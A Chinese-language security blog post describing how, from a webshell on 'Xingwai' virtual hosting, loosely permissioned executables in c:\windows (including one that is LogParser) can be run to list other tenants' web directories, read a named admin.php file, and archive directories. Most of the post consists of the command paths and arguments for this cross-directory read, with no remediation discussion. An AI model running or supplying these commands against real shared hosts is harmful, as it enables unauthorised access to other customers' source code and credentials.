星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe

c:\windows\7i24IISLOG2.exe

c:\windows\7i24IISLOG3.exe

c:\windows\7i24IISLOG4.exe

c:\windows\7i24tool.exe

c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

在 webshell中

CmdPath:

c:\windows\7i24IISLOG

Argument:

“select top 100 path from e:\host\*.*” -i:FS -rtp:-1

下面读取文件内容:

c:\windows\7i24IISLOG

“select text from e:\host\0233ab\web\admin.php” -i:textline -rtp:-1

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

CmdPath:

c:\windows\7i24IISLOG3

Argument:

e:\host\0233ab\web\ c:\windows\temp\123.rar

同样的还有rbs.exe

CmdPath:

c:\windows\rbs -r -v 024dbjj

Argument:

e:\host\0233ab\web\*.*

​

 

    上一篇: 常见Flash XSS攻击方式 - 网站安全 - 自学php

    下一篇: 齐博CMSb2b系统 二次注入 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《星外虚拟主机跨web目录文件读取技巧 – 网站安全
   

还没有人抢沙发呢~